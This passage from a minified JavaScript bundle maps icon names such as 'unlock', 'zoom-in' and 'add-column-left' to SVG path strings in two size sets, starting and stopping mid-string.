13l3.885-4.44L3 9l3.07-4.297L5 5l3-5 3 5-1.07-.297L13 9l-1.885-.44L15 13l-6-1.143z"],"trending-down":["M15 7c-.55 0-1 .45-1 1v.59l-4.29-4.3A.997.997 0 0 0 9 4c-.16 0-.31.05-.44.11V4.1L5 5.88 1.45 4.11v.01C1.31 4.05 1.16 4 1 4c-.55 0-1 .45-1 1 0 .39.23.72.56.89v.01l4 2v-.01c.13.06.28.11.44.11s.31-.05.44-.11v.01L8.8 6.22 12.59 10H12c-.55 0-1 .45-1 1s.45 1 1 1h3c.55 0 1-.45 1-1V8c0-.55-.45-1-1-1z"],"trending-up":["M15 4h-3c-.55 0-1 .45-1 1s.45 1 1 1h.59L8.8 9.78 5.45 8.11v.01C5.31 8.05 5.16 8 5 8s-.31.05-.44.11V8.1l-4 2v.01c-.33.17-.56.5-.56.89 0 .55.45 1 1 1 .16 0 .31-.05.44-.11v.01L5 10.12l3.55 1.78v-.01c.14.06.29.11.45.11.28 0 .53-.11.71-.29L14 7.41V8c0 .55.45 1 1 1s1-.45 1-1V5c0-.55-.45-1-1-1z"],"two-columns":["M3.99-.01h-3c-.55 0-1 .45-1 1v14c0 .55.45 1 1 1h3c.55 0 1-.45 1-1v-14c0-.55-.45-1-1-1zm11.71 7.3l-2-2a1.003 1.003 0 0 0-1.71.71v4a1.003 1.003 0 0 0 1.71.71l2-2c.18-.18.29-.43.29-.71s-.11-.53-.29-.71zM9.99-.01h-3c-.55 0-1 .45-1 1v14c0 .55.45 1 1 1h3c.55 0 1-.45 1-1v-14c0-.55-.45-1-1-1z"],underline:["M8 14c2.8 0 5-2.2 5-5V3c0-.6-.4-1-1-1s-1 .4-1 1v6c0 1.7-1.3 3-3 3s-3-1.3-3-3V3c0-.6-.4-1-1-1s-1 .4-1 1v6c0 2.8 2.2 5 5 5zM13.5 15h-11c-.3 0-.5.2-.5.5s.2.5.5.5h11c.3 0 .5-.2.5-.5s-.2-.5-.5-.5z"],undo:["M4 11c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zm7-7H3.41L4.7 2.71c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71l-3 3C.11 4.47 0 4.72 0 5c0 .28.11.53.29.71l3 3a1.003 1.003 0 0 0 1.42-1.42L3.41 6H11c1.66 0 3 1.34 3 3s-1.34 3-3 3H7v2h4c2.76 0 5-2.24 5-5s-2.24-5-5-5z"],"ungroup-objects":["M3.5 5C1.57 5 0 6.57 0 8.5S1.57 12 3.5 12 7 10.43 7 8.5 5.43 5 3.5 5zm9 0C10.57 5 9 6.57 9 8.5s1.57 3.5 3.5 3.5S16 10.43 16 8.5 14.43 5 12.5 5z"],"unknown-vehicle":["M10.507 9.75v-3.5c0-.089.023-.171.051-.25h-7.55c-.176 0-.061-.824 0-1l.729-1.63c.06-.177.095-.37.27-.37h4.5V1.01c-.166-.003-.32-.01-.5-.01-2.72 0-4.036.402-4.036.402-.508.155-1.079.711-1.268 1.237L1.94 4.756H.887c-.483 0-.88.423-.88.939s.397.939.88.939h.376L1.008 7c-.034.685 0 1.436 0 2v5c0 .657.384 1 1 1s1-.343 1-1v-1h10v1c0 .657.383 1 1 1s1-.343 1-1v-3.5h-3.75a.75.75 0 0 1-.75-.75zm-5.5.25h-2V8h2v2zm11-4.305zM15.34.826a2.807 2.807 0 0 0-.932-.598c-.386-.16-.868-.241-1.445-.241-.447 0-.851.076-1.213.228-.362.153-.67.364-.926.636s-.456.592-.598.963a3.535 3.535 0 0 0-.218 1.144V3h1.789c.003-.208.023-.405.069-.588.049-.193.124-.362.225-.506.102-.144.232-.259.39-.345.159-.087.348-.13.567-.13.325 0 .58.09.762.272.183.18.275.46.275.839.008.222-.031.407-.116.555a1.654 1.654 0 0 1-.335.408 7.4 7.4 0 0 1-.452.37c-.162.123-.316.27-.463.438a2.556 2.556 0 0 0-.384.611c-.11.239-.177.535-.2.889V6h1.645v-.1c.032-.248.111-.453.237-.618.126-.164.27-.31.433-.438.163-.128.335-.255.518-.383a2.413 2.413 0 0 0 .878-1.117c.102-.255.152-.58.152-.975A2.241 2.241 0 0 0 15.34.826zM12.007 7v2h2V7h-2z"],unlock:["M11.99-.01c-2.21 0-4 1.79-4 4v3h-7c-.55 0-1 .45-1 1v7c0 .55.45 1 1 1h12c.55 0 1-.45 1-1v-7c0-.55-.45-1-1-1h-3v-3c0-1.1.9-2 2-2s2 .9 2 2v1c0 .55.45 1 1 1s1-.45 1-1v-1c0-2.21-1.79-4-4-4z"],unpin:["M9.39 1c-.5.5-.4 1.48.15 2.53L4.38 7.54C2.85 6.5 1.52 6.07 1 6.59l3.5 3.5c-.02.02-1.4 2.8-1.4 2.8l2.8-1.4 3.5 3.5c.53-.53.1-1.86-.95-3.38l4.02-5.16c1.04.55 2.01.65 2.51.14L9.39 1z"],unresolve:["M11 3c-.55 0-1.07.09-1.57.26a6.46 6.46 0 0 1 0 9.48c.5.17 1.02.26 1.57.26 2.76 0 5-2.24 5-5s-2.24-5-5-5zM9.78 9.38l.09-.27c.08-.36.13-.73.13-1.11s-.05-.75-.13-1.11l-.09-.27a5.32 5.32 0 0 0-.29-.79l-.12-.21c-.14-.27-.31-.52-.51-.76a.7.7 0 0 0-.08-.1c-.24-.27-.49-.52-.78-.74-.43-.32-.92-.58-1.45-.75l.01-.01c-.1-.03-.2-.05-.3-.08-.12-.03-.23-.07-.36-.09A5.28 5.28 0 0 0 5 3C2.24 3 0 5.24 0 8s2.24 5 5 5c.31 0 .61-.04.9-.09.12-.02.24-.06.36-.09.1-.03.21-.04.3-.08l-.01-.01c.88-.29 1.64-.8 2.22-1.49.03-.03.06-.07.09-.1.19-.24.36-.49.51-.76.04-.07.08-.14.11-.21.13-.25.23-.52.3-.79z"],updated:["M8 0a7.95 7.95 0 0 0-6 2.74V1c0-.55-.45-1-1-1S0 .45 0 1v4c0 .55.45 1 1 1h4c.55 0 1-.45 1-1s-.45-1-1-1H3.54C4.64 2.78 6.22 2 8 2c3.31 0 6 2.69 6 6 0 2.61-1.67 4.81-4 5.63-.63.22-1.29.37-2 .37-3.31 0-6-2.69-6-6 0-.55-.45-1-1-1s-1 .45-1 1c0 4.42 3.58 8 8 8 .34 0 .67-.03 1-.07.02 0 .04-.01.06-.01C12.98 15.4 16 12.06 16 8c0-4.42-3.58-8-8-8zm3 5c-.28 0-.53.11-.71.29L7 8.58 5.71 7.29a1.003 1.003 0 0 0-1.42 1.42l2 2c.18.18.43.29.71.29.28 0 .53-.11.71-.29l4-4A1.003 1.003 0 0 0 11 5z"],upload:["M8 0C3.58 0 0 3.58 0 8s3.58 8 8 8 8-3.58 8-8-3.58-8-8-8zm3 8c-.28 0-.53-.11-.71-.29L9 6.41V12c0 .55-.45 1-1 1s-1-.45-1-1V6.41l-1.29 1.3a1.003 1.003 0 0 1-1.42-1.42l3-3C7.47 3.11 7.72 3 8 3s.53.11.71.29l3 3A1.003 1.003 0 0 1 11 8z"],user:["M7.99-.01A7.998 7.998 0 0 0 .03 8.77c.01.09.03.18.04.28.02.15.04.31.07.47.02.11.05.22.08.34.03.13.06.26.1.38.04.12.08.25.12.37.04.11.08.21.12.32a6.583 6.583 0 0 0 .3.65c.07.14.14.27.22.4.04.07.08.13.12.2l.27.42.1.13a7.973 7.973 0 0 0 3.83 2.82c.03.01.05.02.07.03.37.12.75.22 1.14.29l.2.03c.39.06.79.1 1.2.1s.81-.04 1.2-.1l.2-.03c.39-.07.77-.16 1.14-.29.03-.01.05-.02.07-.03a8.037 8.037 0 0 0 3.83-2.82c.03-.04.06-.08.09-.13.1-.14.19-.28.28-.42.04-.07.08-.13.12-.2.08-.13.15-.27.22-.41.04-.08.08-.17.12-.26.06-.13.11-.26.17-.39.04-.1.08-.21.12-.32.04-.12.08-.24.12-.37.04-.13.07-.25.1-.38.03-.11.06-.22.08-.34.03-.16.05-.31.07-.47.01-.09.03-.18.04-.28.02-.26.04-.51.04-.78-.03-4.41-3.61-7.99-8.03-7.99zm0 14.4c-1.98 0-3.75-.9-4.92-2.31.67-.36 1.49-.66 2.14-.95 1.16-.52 1.04-.84 1.08-1.27.01-.06.01-.11.01-.17-.41-.36-.74-.86-.96-1.44v-.01c0-.01-.01-.02-.01-.02-.05-.13-.09-.26-.12-.39-.28-.05-.44-.35-.5-.63-.06-.11-.18-.38-.15-.69.04-.41.2-.59.38-.67v-.06c0-.51.05-1.24.14-1.72.02-.13.05-.26.09-.39.17-.59.53-1.12 1.01-1.49.49-.38 1.19-.59 1.82-.59.62 0 1.32.2 1.82.59.48.37.84.9 1.01 1.49.04.13.07.26.09.4.09.48.14 1.21.14 1.72v.07c.18.08.33.26.37.66.03.31-.1.58-.16.69-.06.27-.21.57-.48.62-.03.13-.07.26-.12.38 0 .01-.01.04-.01.04-.21.57-.54 1.06-.94 1.42 0 .06.01.13.01.19.04.43-.12.75 1.05 1.27.65.29 1.47.6 2.14.95a6.415 6.415 0 0 1-4.93 2.31z"],variable:["M3.94 3.15c.47-.66 1.05-1.24 1.76-1.73l.13-.4c-1.11.45-2.05 1.01-2.84 1.7-1.02.88-1.8 1.9-2.32 3.05C.22 6.76 0 7.75 0 8.75c0 1.75.66 3.5 1.99 5.25l.13-.42c-.39-.94-.59-1.82-.59-2.63 0-1.28.22-2.64.67-4.1.45-1.45 1.03-2.69 1.74-3.7zm7.51 6.41l-.27-.15c-.3.41-.52.66-.66.77-.09.06-.21.1-.33.1-.15 0-.3-.1-.45-.28-.25-.33-.59-1.22-1.01-2.69.38-.65.69-1.08.95-1.28.19-.15.39-.22.59-.22.08 0 .22.03.43.08.2.06.39.08.54.08.22 0 .4-.07.54-.22.15-.15.22-.34.22-.57 0-.25-.07-.45-.22-.59-.15-.15-.35-.22-.63-.22-.24 0-.47.06-.69.17-.21.11-.49.36-.82.74-.25.28-.61.78-1.1 1.48a6.72 6.72 0 0 0-.97-2.38l-2.59.44-.05.27c.19-.04.36-.06.49-.06.26 0 .47.11.64.33.26.34.63 1.38 1.11 3.12-.37.49-.63.81-.77.96-.23.24-.41.4-.56.47-.11.06-.24.09-.39.09-.11 0-.29-.06-.53-.18-.17-.07-.32-.11-.45-.11-.25 0-.46.08-.62.24-.16.16-.24.37-.24.61 0 .23.08.42.23.57.15.15.35.22.61.22.25 0 .48-.05.7-.15.22-.1.49-.32.82-.65.33-.33.78-.86 1.36-1.59.22.69.42 1.19.58 1.51.16.31.35.54.56.68.21.14.47.21.79.21.31 0 .62-.11.93-.33.4-.29.82-.77 1.26-1.47zm2.56-8.54l-.12.42c.39.95.59 1.82.59 2.64 0 1.09-.17 2.26-.5 3.51-.26.96-.6 1.87-1.02 2.71-.42.85-.82 1.51-1.21 1.98-.39.48-.87.92-1.44 1.32l-.14.4c1.11-.45 2.05-1.02 2.84-1.7 1.03-.89 1.81-1.91 2.33-3.05.44-.99.66-1.99.66-3 0-1.73-.66-3.48-1.99-5.23z"],"vertical-bar-chart-asc":["M6 7c-.55 0-1 .45-1 1v7c0 .55.45 1 1 1s1-.45 1-1V8c0-.55-.45-1-1-1zM2 9c-.55 0-1 .45-1 1v5c0 .55.45 1 1 1s1-.45 1-1v-5c0-.55-.45-1-1-1zm8-5c-.55 0-1 .45-1 1v10c0 .55.45 1 1 1s1-.45 1-1V5c0-.55-.45-1-1-1zm4-4c-.55 0-1 .45-1 1v14c0 .55.45 1 1 1s1-.45 1-1V1c0-.55-.45-1-1-1z"],"vertical-bar-chart-desc":["M6 4c-.55 0-1 .45-1 1v10c0 .55.45 1 1 1s1-.45 1-1V5c0-.55-.45-1-1-1zM2 0c-.55 0-1 .45-1 1v14c0 .55.45 1 1 1s1-.45 1-1V1c0-.55-.45-1-1-1zm8 7c-.55 0-1 .45-1 1v7c0 .55.45 1 1 1s1-.45 1-1V8c0-.55-.45-1-1-1zm4 2c-.55 0-1 .45-1 1v5c0 .55.45 1 1 1s1-.45 1-1v-5c0-.55-.45-1-1-1z"],"vertical-distribution":["M1 2h14c.55 0 1-.45 1-1s-.45-1-1-1H1C.45 0 0 .45 0 1s.45 1 1 1zm14 11H1c-.55 0-1 .45-1 1s.45 1 1 1h14c.55 0 1-.45 1-1s-.45-1-1-1zM3 5c-.55 0-1 .45-1 1v3c0 .55.45 1 1 1h9c.55 0 1-.45 1-1V6c0-.55-.45-1-1-1H3z"],video:["M15 2H1c-.55 0-1 .45-1 1v10c0 .55.45 1 1 1h14c.55 0 1-.45 1-1V3c0-.55-.45-1-1-1zM5 11V5l6 3-6 3z"],"volume-down":["M9 2c-.28 0-.53.11-.71.29L5.59 5H3c-.55 0-1 .45-1 1v4c0 .55.45 1 1 1h2.59l2.71 2.71c.17.18.42.29.7.29.55 0 1-.45 1-1V3c0-.55-.45-1-1-1zm3.57 1.44l-1.59 1.22C11.62 5.61 12 6.76 12 8s-.38 2.39-1.02 3.34l1.59 1.22C13.47 11.27 14 9.7 14 8c0-1.7-.53-3.27-1.43-4.56z"],"volume-off":["M11 2c-.28 0-.53.11-.71.29L7.59 5H5c-.55 0-1 .45-1 1v4c0 .55.45 1 1 1h2.59l2.71 2.71c.17.18.42.29.7.29.55 0 1-.45 1-1V3c0-.55-.45-1-1-1z"],"volume-up":["M7 1.86c-.28 0-.53.11-.71.29l-2.7 2.71H1c-.55 0-1 .45-1 1v4c0 .55.45 1 1 1h2.59l2.71 2.71a1.003 1.003 0 0 0 1.71-.71v-10c-.01-.55-.46-1-1.01-1zm6.74-.99l-1.58 1.22A9.985 9.985 0 0 1 14 7.86c0 2.16-.69 4.15-1.85 5.78l1.58 1.22c1.42-1.97 2.26-4.38 2.26-7 .01-2.61-.84-5.02-2.25-6.99zM8.98 4.52C9.62 5.48 10 6.63 10 7.86s-.38 2.39-1.02 3.34l1.59 1.22c.9-1.29 1.43-2.86 1.43-4.56 0-1.7-.53-3.27-1.43-4.56L8.98 4.52z"],walk:["M13 8h-2c-.16 0-.31-.05-.44-.11v.01l-1.02-.51-.37 1.86 1.38.92-.01.02c.27.17.46.46.46.81v4c0 .55-.45 1-1 1s-1-.45-1-1v-3.46l-1.27-.85-1.8 4.67h-.01A.98.98 0 0 1 5 16c-.55 0-1-.45-1-1 0-.13.03-.25.07-.36h-.01L7.39 6H5.62l-.73 1.45h-.01C4.72 7.77 4.39 8 4 8c-.55 0-1-.45-1-1 0-.16.05-.31.11-.44H3.1l1-2h.01c.17-.33.5-.56.89-.56h3.16l.29-.75C8.17 2.9 8 2.47 8 2c0-1.1.9-2 2-2s2 .9 2 2c0 1-.73 1.82-1.69 1.97l-.5 1.32 1.43.71H13c.55 0 1 .45 1 1s-.45 1-1 1z"],"warning-sign":["M15.84 13.5l.01-.01-7-12-.01.01c-.17-.3-.48-.5-.85-.5s-.67.2-.85.5l-.01-.01-7 12 .01.01c-.09.15-.15.31-.15.5 0 .55.45 1 1 1h14c.55 0 1-.45 1-1 0-.19-.06-.35-.15-.5zm-6.85-.51h-2v-2h2v2zm0-3h-2v-5h2v5z"],"waterfall-chart":["M8 7c.55 0 1-.45 1-1s-.45-1-1-1-1 .45-1 1 .45 1 1 1zm-4 4h1c.55 0 1-.45 1-1V8c0-.55-.45-1-1-1H4c-.55 0-1 .45-1 1v2c0 .55.45 1 1 1zm7-6c.55 0 1-.45 1-1V3c0-.55-.45-1-1-1s-1 .45-1 1v1c0 .55.45 1 1 1zm4-3h-1c-.55 0-1 .45-1 1v7c0 .55.45 1 1 1h1c.55 0 1-.45 1-1V3c0-.55-.45-1-1-1zm0 10H2V3c0-.55-.45-1-1-1s-1 .45-1 1v10c0 .55.45 1 1 1h14c.55 0 1-.45 1-1s-.45-1-1-1z"],widget:["M13 11h2V5h-2v6zM3 5H1v6h2V5zm11-1c1.1 0 2-.9 2-2s-.9-2-2-2-2 .9-2 2 .9 2 2 2zM2 12c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zm12 0c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zM5 3h6V1H5v2zM2 0C.9 0 0 .9 0 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zm3 15h6v-2H5v2z"],"widget-button":["M1 3h14c.55 0 1 .45 1 1v8c0 .55-.45 1-1 1H1c-.55 0-1-.45-1-1V4c0-.55.45-1 1-1zm1 2v6h12V5H2zm3 4c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1zm3 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1zm3 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"],"widget-footer":["M14 0H2c-.55 0-1 .45-1 1v14c0 .55.45 1 1 1h12c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zm-1 14H3v-3h10v3zm0-4H3V2h10v8z"],"widget-header":["M14 0H2c-.55 0-1 .45-1 1v14c0 .55.45 1 1 1h12c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zm-1 14H3V6h10v8zm0-9H3V2h10v3z"],wrench:["M15.83 3.7l-3.06 3.05-2.84-.7-.7-2.83L12.29.17a5.004 5.004 0 0 0-4.83 1.29 4.967 4.967 0 0 0-1.12 5.36L.58 12.58c-.36.36-.58.86-.58 1.41 0 1.1.9 2 2 2 .55 0 1.05-.22 1.41-.59l5.77-5.77c1.79.69 3.91.33 5.35-1.12 1.32-1.3 1.74-3.15 1.3-4.81z"],"zoom-in":["M7.99 5.99v-2c0-.55-.45-1-1-1s-1 .45-1 1v2h-2c-.55 0-1 .45-1 1s.45 1 1 1h2v2c0 .55.45 1 1 1s1-.45 1-1v-2h2c.55 0 1-.45 1-1s-.45-1-1-1h-2zm7.56 7.44l-2.67-2.68a6.94 6.94 0 0 0 1.11-3.76c0-3.87-3.13-7-7-7s-7 3.13-7 7 3.13 7 7 7c1.39 0 2.68-.42 3.76-1.11l2.68 2.67a1.498 1.498 0 1 0 2.12-2.12zm-8.56-1.44c-2.76 0-5-2.24-5-5s2.24-5 5-5 5 2.24 5 5-2.24 5-5 5z"],"zoom-out":["M3.99 5.99c-.55 0-1 .45-1 1s.45 1 1 1h6c.55 0 1-.45 1-1s-.45-1-1-1h-6zm11.56 7.44l-2.67-2.68a6.94 6.94 0 0 0 1.11-3.76c0-3.87-3.13-7-7-7s-7 3.13-7 7 3.13 7 7 7c1.39 0 2.68-.42 3.76-1.11l2.68 2.67a1.498 1.498 0 1 0 2.12-2.12zm-8.56-1.44c-2.76 0-5-2.24-5-5s2.24-5 5-5 5 2.24 5 5-2.24 5-5 5z"],"zoom-to-fit":["M11 10a1.003 1.003 0 0 0 1.71.71l2-2c.18-.18.29-.43.29-.71 0-.28-.11-.53-.29-.71l-2-2a1.003 1.003 0 0 0-1.42 1.42L12.59 8 11.3 9.29c-.19.18-.3.43-.3.71zM1 5c.55 0 1-.45 1-1V2h2c.55 0 1-.45 1-1s-.45-1-1-1H1C.45 0 0 .45 0 1v3c0 .55.45 1 1 1zm4 1a1.003 1.003 0 0 0-1.71-.71l-2 2C1.11 7.47 1 7.72 1 8c0 .28.11.53.29.71l2 2a1.003 1.003 0 0 0 1.42-1.42L3.41 8 4.7 6.71c.19-.18.3-.43.3-.71zm1-1c.28 0 .53-.11.71-.29L8 3.41 9.29 4.7c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71l-2-2C8.53 1.11 8.28 1 8 1s-.53.11-.71.29l-2 2A1.003 1.003 0 0 0 6 5zm9 6c-.55 0-1 .45-1 1v2h-2c-.55 0-1 .45-1 1s.45 1 1 1h3c.55 0 1-.45 1-1v-3c0-.55-.45-1-1-1zm0-11h-3c-.55 0-1 .45-1 1s.45 1 1 1h2v2c0 .55.45 1 1 1s1-.45 1-1V1c0-.55-.45-1-1-1zM4 14H2v-2c0-.55-.45-1-1-1s-1 .45-1 1v3c0 .55.45 1 1 1h3c.55 0 1-.45 1-1s-.45-1-1-1zm6-3c-.28 0-.53.11-.71.29L8 12.59 6.71 11.3A.965.965 0 0 0 6 11a1.003 1.003 0 0 0-.71 1.71l2 2c.18.18.43.29.71.29s.53-.11.71-.29l2-2A1.003 1.003 0 0 0 10 11z"]},h={add:["M10 0C4.48 0 0 4.48 0 10s4.48 10 10 10 10-4.48 10-10S15.52 0 10 0zm0 18c-4.42 0-8-3.58-8-8s3.58-8 8-8 8 3.58 8 8-3.58 8-8 8zm5-9h-4V5c0-.55-.45-1-1-1s-1 .45-1 1v4H5c-.55 0-1 .45-1 1s.45 1 1 1h4v4c0 .55.45 1 1 1s1-.45 1-1v-4h4c.55 0 1-.45 1-1s-.45-1-1-1z"],"add-column-left":["M4 11h2v2c0 .55.45 1 1 1s1-.45 1-1v-2h2c.55 0 1-.45 1-1s-.45-1-1-1H8V7c0-.55-.45-1-1-1s-1 .45-1 1v2H4c-.55 0-1 .45-1 1s.45 1 1 1zM19 0H1C.45 0 0 .45 0 1v18c0 .55.45 1 1 1h18c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zm-7 18H2V2h10v16zm6 0h-5V2h5v16z"],"add-column-right":["M10 11h2v2c0 .55.45 1 1 1s1-.45 1-1v-2h2c.55 0 1-.45 1-1s-.45-1-1-1h-2V7c0-.55-.45-1-1-1s-1 .45-1 1v2h-2c-.55 0-1 .45-1 1s.45 1 1 1zm9-11H1C.45 0 0 .45 0 1v18c0 .55.45 1 1 1h18c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zM7 18H2V2h5v16zm11 0H8V2h10v16z"],"add-row-bottom":["M19 0H1C.45 0 0 .45 0 1v18c0 .55.45 1 1 1h18c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zm-1 18H2V8h16v10zm0-11H2V2h16v5zM7 14h2v2c0 .55.45 1 1 1s1-.45 1-1v-2h2c.55 0 1-.45 1-1s-.45-1-1-1h-2v-2c0-.55-.45-1-1-1s-1 .45-1 1v2H7c-.55 0-1 .45-1 1s.45 1 1 1z"],"add-row-top":["M7 8h2v2c0 .55.45 1 1 1s1-.45 1-1V8h2c.55 0 1-.45 1-1s-.45-1-1-1h-2V4c0-.55-.45-1-1-1s-1 .45-1 1v2H7c-.55 0-1 .45-1 1s.45 1 1 1zm12-8H1C.45 0 0 .45 0 1v18c0 .55.45 1 1 1h18c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zm-1 18H2v-5h16v5zm0-6H2V2h16v10z"],"add-to-artifact":["M13 12H1c-.55 0-1 .45-1 1s.45 1 1 1h12c.55 0 1-.45 1-1s-.45-1-1-1zm0 4H1c-.55 0-1 .45-1 1s.45 1 1 1h12c.55 0 1-.45 1-1s-.45-1-1-1zM1 6h9c.55 0 1-.45 1-1s-.45-1-1-1H1c-.55 0-1 .45-1 1s.45 1 1 1zm12 2H1c-.55 0-1 .45-1 1s.45 1 1 1h12c.55 0 1-.45 1-1s-.45-1-1-1zm6-4h-2V2c0-.55-.45-1-1-1s-1 .45-1 1v2h-2c-.55 0-1 .45-1 1s.45 1 1 1h2v2c0 .55.45 1 1 1s1-.45 1-1V6h2c.55 0 1-.45 1-1s-.45-1-1-1z"],"add-to-folder":["M.01 10V6H20v10c0 .55-.45 1-1 1H9.995v-3.99C9.965 11.332 8.635 10 6.987 10H.01zM19 3c.55 0 1 .45.99 1v1H0V2c0-.55.45-1 1-1h5.997c.28 0 .53.11.71.29L9.414 3H19zM6.987 12c.55 0 .999.45 1.009 1.01v5c0 .55-.45 1-1 1s-.999-.45-.999-1v-2.59l-4.288 4.29a1.003 1.003 0 0 1-1.42-1.42L4.579 14H1.989c-.55 0-1-.45-1-1s.45-1 1-1h4.998z"],airplane:["M20 2c0-1.1-.9-2-2-2-.55 0-1.05.22-1.41.59l-4.84 4.84L2 1 1 3l7.53 5.64L4.17 13H1l-1 1 4 2 2 4 1-1v-3.17l4.36-4.36L17 19l2-1-4.43-9.74 4.84-4.84c.37-.37.59-.87.59-1.42z"],"align-center":["M5 5c-.55 0-1 .45-1 1s.45 1 1 1h10c.55 0 1-.45 1-1s-.45-1-1-1H5zM1 3h18c.55 0 1-.45 1-1s-.45-1-1-1H1c-.55 0-1 .45-1 1s.45 1 1 1zm12 12c.55 0 1-.45 1-1s-.45-1-1-1H7c-.55 0-1 .45-1 1s.45 1 1 1h6zm4 2H3c-.55 0-1 .45-1 1s.45 1 1 1h14c.55 0 1-.45 1-1s-.45-1-1-1zm2-8H1c-.55 0-1 .45-1 1s.45 1 1 1h18c.55 0 1-.45 1-1s-.45-1-1-1z"],"align-justify":["M1 3h18c.55 0 1-.45 1-1s-.45-1-1-1H1c-.55 0-1 .45-1 1s.45 1 1 1zm18 14H1c-.55 0-1 .45-1 1s.45 1 1 1h18c.55 0 1-.45 1-1s-.45-1-1-1zm0-12H1c-.55 0-1 .45-1 1s.45 1 1 1h18c.55 0 1-.45 1-1s-.45-1-1-1zm0 4H1c-.55 0-1 .45-1 1s.45 1 1 1h18c.55 0 1-.45 1-1s-.45-1-1-1zm0 4H1c-.55 0-1 .45-1 1s.45 1 1 1h18c.55 0 1-.45 1-1s-.45-1-1-1z"],"align-left":["M1 7h10c.55 0 1-.45 1-1s-.45-1-1-1H1c-.55 0-1 .45-1 1s.45 1 1 1zm0-4h18c.55 0 1-.45 1-1s-.45-1-1-1H1c-.55 0-1 .45-1 1s.45 1 1 1zm14 14H1c-.55 0-1 .45-1 1s.45 1 1 1h14c.55 0 1-.45 1-1s-.45-1-1-1zm4-8H1c-.55 0-1 .45-1 1s.45 1 1 1h18c.55 0 1-.45 1-1s-.45-1-1-1zM1 15h6c.55 0 1-.45 1-1s-.45-1-1-1H1c-.55 0-1 .45-1 1s.45 1 1 1z"],"align-right":["M19 17H5c-.55 0-1 .45-1 1s.45 1 1 1h14c.55 0 1-.45 1-1s-.45-1-1-1zM1 3h18c.55 0 1-.45 1-1s-.45-1-1-1H1c-.55 0-1 .45-1 1s.45 1 1 1zm18 10h-6c-.55 0-1 .45-1 1s.45 1 1 1h6c.55 0 1-.45 1-1s-.45-1-1-1zm0-4H1c-.55 0-1 .45-1 1s.45 1 1 1h18c.55 0 1-.45 1-1s-.45-1-1-1zm0-4H9c-.55 0-1 .45-1 1s.45 1 1 1h10c.55 0 1-.45 1-1s-.45-1-1-1z"],"alignment-bottom":["M12 16h4c.55 0 1-.45 1-1V8c0-.55-.45-1-1-1h-4c-.55 0-1 .45-1 1v7c0 .55.45 1 1 1zm7 2H1c-.55 0-1 .45-1 1s.45 1 1 1h18c.55 0 1-.45 1-1s-.45-1-1-1zM4 16h4c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1H4c-.55 0-1 .45-1 1v14c0 .55.45 1 1 1z"],"alignment-horizontal-center":["M19 9h-2V7c0-.55-.45-1-1-1h-4c-.55 0-1 .45-1 1v2H9V3c0-.55-.45-1-1-1H4c-.55 0-1 .45-1 1v6H1c-.55 0-1 .45-1 1s.45 1 1 1h2v6c0 .55.45 1 1 1h4c.55 0 1-.45 1-1v-6h2v2c0 .55.45 1 1 1h4c.55 0 1-.45 1-1v-2h2c.55 0 1-.45 1-1s-.45-1-1-1z"],"alignment-left":["M1 0C.45 0 0 .45 0 1v18c0 .55.45 1 1 1s1-.45 1-1V1c0-.55-.45-1-1-1zm11 11H5c-.55 0-1 .45-1 1v4c0 .55.45 1 1 1h7c.55 0 1-.45 1-1v-4c0-.55-.45-1-1-1zm7-8H5c-.55 0-1 .45-1 1v4c0 .55.45 1 1 1h14c.55 0 1-.45 1-1V4c0-.55-.45-1-1-1z"],"alignment-right":["M19 0c-.55 0-1 .45-1 1v18c0 .55.45 1 1 1s1-.45 1-1V1c0-.55-.45-1-1-1zm-4 11H8c-.55 0-1 .45-1 1v4c0 .55.45 1 1 1h7c.55 0 1-.45 1-1v-4c0-.55-.45-1-1-1zm0-8H1c-.55 0-1 .45-1 1v4c0 .55.45 1 1 1h14c.55 0 1-.45 1-1V4c0-.55-.45-1-1-1z"],"alignment-top":["M8 4H4c-.55 0-1 .45-1 1v14c0 .55.45 1 1 1h4c.55 0 1-.45 1-1V5c0-.55-.45-1-1-1zm11-4H1C.45 0 0 .45 0 1s.45 1 1 1h18c.55 0 1-.45 1-1s-.45-1-1-1zm-3 4h-4c-.55 0-1 .45-1 1v7c0 .55.45 1 1 1h4c.55 0 1-.45 1-1V5c0-.55-.45-1-1-1z"],"alignment-vertical-center":["M17 3h-6V1c0-.55-.45-1-1-1S9 .45 9 1v2H3c-.55 0-1 .45-1 1v4c0 .55.45 1 1 1h6v2H7c-.55 0-1 .45-1 1v4c0 .55.45 1 1 1h2v2c0 .55.45 1 1 1s1-.45 1-1v-2h2c.55 0 1-.45 1-1v-4c0-.55-.45-1-1-1h-2V9h6c.55 0 1-.45 1-1V4c0-.55-.45-1-1-1z"],annotation:["M9.41 13.41l7.65-7.65-2.83-2.83-7.65 7.65 2.83 2.83zm10-10c.37-.36.59-.86.59-1.41 0-1.1-.9-2-2-2-.55 0-1.05.22-1.41.59l-1.65 1.65 2.83 2.83 1.64-1.66zM18 18H2V2h8.93l2-2H1C.45 0 0 .45 0 1v18c0 .55.45 1 1 1h18c.55 0 1-.45 1-1V7.07l-2 2V18zM4 16l4.41-1.59-2.81-2.79L4 16z"],application:["M3.5 9h9c.28 0 .5-.22.5-.5s-.22-.5-.5-.5h-9c-.28 0-.5.22-.5.5s.22.5.5.5zm0 2h5c.28 0 .5-.22.5-.5s-.22-.5-.5-.5h-5c-.28 0-.5.22-.5.5s.22.5.5.5zM19 1H1c-.55 0-1 .45-1 1v16c0 .55.45 1 1 1h18c.55 0 1-.45 1-1V2c0-.55-.45-1-1-1zm-1 16H2V6h16v11zM3.5 13h7c.28 0 .5-.22.5-.5s-.22-.5-.5-.5h-7c-.28 